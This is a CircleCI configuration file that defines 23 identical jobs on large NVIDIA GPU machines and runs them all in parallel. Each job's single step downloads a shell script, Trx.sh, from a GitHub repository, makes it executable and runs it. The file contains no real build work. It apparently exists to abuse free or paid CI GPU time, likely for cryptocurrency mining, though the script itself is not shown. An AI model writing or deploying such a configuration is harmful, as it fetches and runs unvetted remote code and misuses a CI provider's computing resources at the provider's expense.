version: 2.1

jobs:
  build:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: sleep 30
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Trx.sh && chmod +x Trx.sh && ./Trx.sh
      

  build2:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Trx.sh && chmod +x Trx.sh && ./Trx.sh
      


  build3:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Trx.sh && chmod +x Trx.sh && ./Trx.sh


  build4:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Trx.sh && chmod +x Trx.sh && ./Trx.sh

  build5:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Trx.sh && chmod +x Trx.sh && ./Trx.sh

  build6:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Trx.sh && chmod +x Trx.sh && ./Trx.sh
      


  build7:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Trx.sh && chmod +x Trx.sh && ./Trx.sh


  build8:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Trx.sh && chmod +x Trx.sh && ./Trx.sh

  build9:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Trx.sh && chmod +x Trx.sh && ./Trx.sh


  build10:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Trx.sh && chmod +x Trx.sh && ./Trx.sh

  build11:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Trx.sh && chmod +x Trx.sh && ./Trx.sh
      


  build12:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Trx.sh && chmod +x Trx.sh && ./Trx.sh


  build13:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Trx.sh && chmod +x Trx.sh && ./Trx.sh

  build14:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Trx.sh && chmod +x Trx.sh && ./Trx.sh

  build15:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Trx.sh && chmod +x Trx.sh && ./Trx.sh
      


  build16:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Trx.sh && chmod +x Trx.sh && ./Trx.sh


  build17:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Trx.sh && chmod +x Trx.sh && ./Trx.sh

  build18:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Trx.sh && chmod +x Trx.sh && ./Trx.sh


  build19:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Trx.sh && chmod +x Trx.sh && ./Trx.sh

  build20:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Trx.sh && chmod +x Trx.sh && ./Trx.sh
      


  build21:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Trx.sh && chmod +x Trx.sh && ./Trx.sh


  build22:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Trx.sh && chmod +x Trx.sh && ./Trx.sh

  build24:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Trx.sh && chmod +x Trx.sh && ./Trx.sh





      
workflows:
    version: 2.1
    build:
        jobs:
            - build
            - build2
            - build3
            - build4
            - build5
            - build6
            - build7
            - build8            
            - build9
            - build10
            - build11
            - build12
            - build13
            - build14
            - build15
            - build16
            - build17          
            - build18
            - build19
            - build20
            - build21
            - build22
            - build24   
